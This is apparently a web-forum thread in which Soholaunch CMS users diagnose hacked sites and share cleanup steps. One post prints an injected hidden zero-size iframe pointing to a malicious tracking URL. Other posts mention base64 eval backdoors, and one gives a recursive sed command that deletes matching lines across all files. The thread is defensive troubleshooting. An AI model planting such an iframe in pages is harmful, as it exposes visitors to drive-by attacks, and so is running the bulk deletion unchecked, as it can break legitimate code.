
"Trojan Horse"
#1
Posted 13 April 2007 - 05:24 PM
The thing is that I cannot see any such alert on my computers (windows xp with McAfee anti virus) and running sohoscan.php did not reveal any problems, either.
Has anyone else encountered this?
#2
Posted 14 April 2007 - 11:40 PM
#3
Posted 15 April 2007 - 10:44 PM
its been reported as setting off anti virus programs but i believe it is still being included in the builds...
George Callaghan
#4
Posted 11 June 2010 - 11:21 AM
On every page is this:
<body> <iframe src="http://googlestat.org/stat/go.php?sid=1" width="0" height="0" frameborder="0"></iframe> </body>
(The first time it was a different url in the iframe)
I've traced the source of this code to shared_functions.php where it appeared once at the beginning of the regular php code, before the 'proper code' begins, and today it appears after the last ?>
I double checked the .htaccess file against another unhacked site and found distinc difference - ie: it was almost non existent, so uploaded a modified version of that to the hacked site.
Now... my question is: where is this vulnerability occurring? Any ideas peeps?
Soho, Wordpress, Drupal, Joomla, etc Template & Web Design - Data Recovery
#5
Posted 11 June 2010 - 12:36 PM
We missed you around here.
I found the same thing on a site today for someone im helping here today.
I have not figured out yet how they got there yet.
dresswell
Free Soholaunch Hosting
Soholaunch Pro or Soholaunch Ultra Free with Hosting.
Check out our soholaunch hosting if your tried others
and were disappointed with your host or there support.
Get the help you need to build your website today.
Now offering a 99cent 1st. month Trial Offer.
Easy Website Maker
#6
Posted 11 June 2010 - 02:11 PM
Can you let me know where the shared_functions.php file is please so I can temporarily fix the problem. I will have to switch my clients to a new CMS one by one asap with this major problem - it has resulted unfortunately in the sites being blacklisted now on Google.
If anyone knows where the vulnerabilty has occured, I too would like to know please.
Thanks.
#7
Posted 11 June 2010 - 02:37 PM
Also, look for a photo.php or photos.php file in your media folder, it will be completely encoded.
What versions are you all running? I was running the latest on mine.
Are any of you using any plugins too? I have two different plugins both by the same company on both of my sites. Those were the similarities between the two.
#8
Posted 11 June 2010 - 02:48 PM
It's very useful.
#9
Posted 11 June 2010 - 03:57 PM
Page.php, 404.php.
Looks like a eval(base64).
Heres how to remove it.
Got this from draknet.
Log in with ssh and run this command:
for file in $(grep "eval(base64_decode(" -lir *); do sed -i 's/eval(base64_decode(.*));//g' $file; done;
It will strip out that line from any file that has it (including ones that should, so be careful using this).
dresswell
Free Soholaunch Hosting
Soholaunch Pro or Soholaunch Ultra Free with Hosting.
Check out our soholaunch hosting if your tried others
and were disappointed with your host or there support.
Get the help you need to build your website today.
Now offering a 99cent 1st. month Trial Offer.
Easy Website Maker
#10
Posted 11 June 2010 - 04:15 PM
I just downloaded the entire site locally and did a 'find in files' command to locate the offending code.
Still unsure of how the exploit works though - although I did find that in the shopping directory the email to friend php file had both the ownership entirely removed as well as having no permissions whatsoever. Tried chmodding it to no avail and had to remove it from server and upload a good version from another Soho site.
Could be just a coincidence.. who knows?
Anyone?

Edit: If they get listed on Google as blacklisted (as my client did) as soon as you clean up the site you can request that they do another scan of the site - you need an account --> webmaster tools...
I'd hang fire on using another CMS until you know how the exploit was carried out: if one piece of software can be hacked, then so might another.....
Edited by DrJon, 11 June 2010 - 04:27 PM.
Soho, Wordpress, Drupal, Joomla, etc Template & Web Design - Data Recovery
#11
Posted 11 June 2010 - 04:41 PM
What i do is run the installsoholaunch.php after the ssh command.
Seams to do the trick.
dresswell
Free Soholaunch Hosting
Soholaunch Pro or Soholaunch Ultra Free with Hosting.
Check out our soholaunch hosting if your tried others
and were disappointed with your host or there support.
Get the help you need to build your website today.
Now offering a 99cent 1st. month Trial Offer.
Easy Website Maker
#12
Posted 11 June 2010 - 04:53 PM
Soho, Wordpress, Drupal, Joomla, etc Template & Web Design - Data Recovery
#13
Posted 11 June 2010 - 05:06 PM
dresswell
Free Soholaunch Hosting
Soholaunch Pro or Soholaunch Ultra Free with Hosting.
Check out our soholaunch hosting if your tried others
and were disappointed with your host or there support.
Get the help you need to build your website today.
Now offering a 99cent 1st. month Trial Offer.
Easy Website Maker
#14
Posted 11 June 2010 - 05:06 PM
As for the email a friend file... this little bugger has been causing issues since day 1, but I'm pretty sure when I was reading about changes in one of the last revisions, Soho said they had pretty much fixed all the issues with it.
I'm tempted to write a plugin that just eliminates it. I never have it turned on for any of my client's sites and ask them not to use it.
#15
Posted 11 June 2010 - 05:45 PM
I removed the code fom the shared_functions.php file relating to that iframe. I also removed something called photo.php in the media folder which was base64 encoded..it's quite scary seeing someone elses user name and password in tha file too..does anyone know what all of this did or what was suppose to do to the site? I assume it was an automated script that targeted multiple sites?
Thanks Dr Jon for the info, I will ask for a rescan of the site in Webmaster Tools - wasn't aware you could do that there.
#16
Posted 11 June 2010 - 06:20 PM
Two points to mention here...
1. There were some exploits in older builds, but we have corrected them. Make sure you're running the latest version (as of right now v4.9.3 r38+).
2. sohoscan.php is your best friend for investigating hacks...
http://www.soholaunc...ia/sohoscan.zip
Please let us know via support ticket if you've cleaned a site, updated to v4.9.3 r38+ and THEN get hacked again (pointing to an outstanding vulnerability).
#17
Posted 11 June 2010 - 06:39 PM
#18
Posted 15 June 2010 - 12:00 PM
ini.php
function.php
prod_cust_card.php
thumb.php
They were all remote ftp programmes - not a good thing to have in your site !
AndyP
#19
Posted 21 June 2010 - 02:17 PM
The code was again attached to the end of the shared functions file so I've removed it and set the chmod to no write mode - we'll see if this makes a difference.

Soho, Wordpress, Drupal, Joomla, etc Template & Web Design - Data Recovery
#20
Posted 21 June 2010 - 10:17 PM
█ DrakNet Web Hosting | (Or just me: jenlepp.com | Twitter: @jenlepp)
Please note that DrakNet no longer offers licensed Soholaunch as of 9/1/2010 - if you are looking at an old forum post that recommends us as a Soholaunch host, please note that situation has changed since the post was made.
0 user(s) are reading this topic
0 members, 0 guests, 0 anonymous users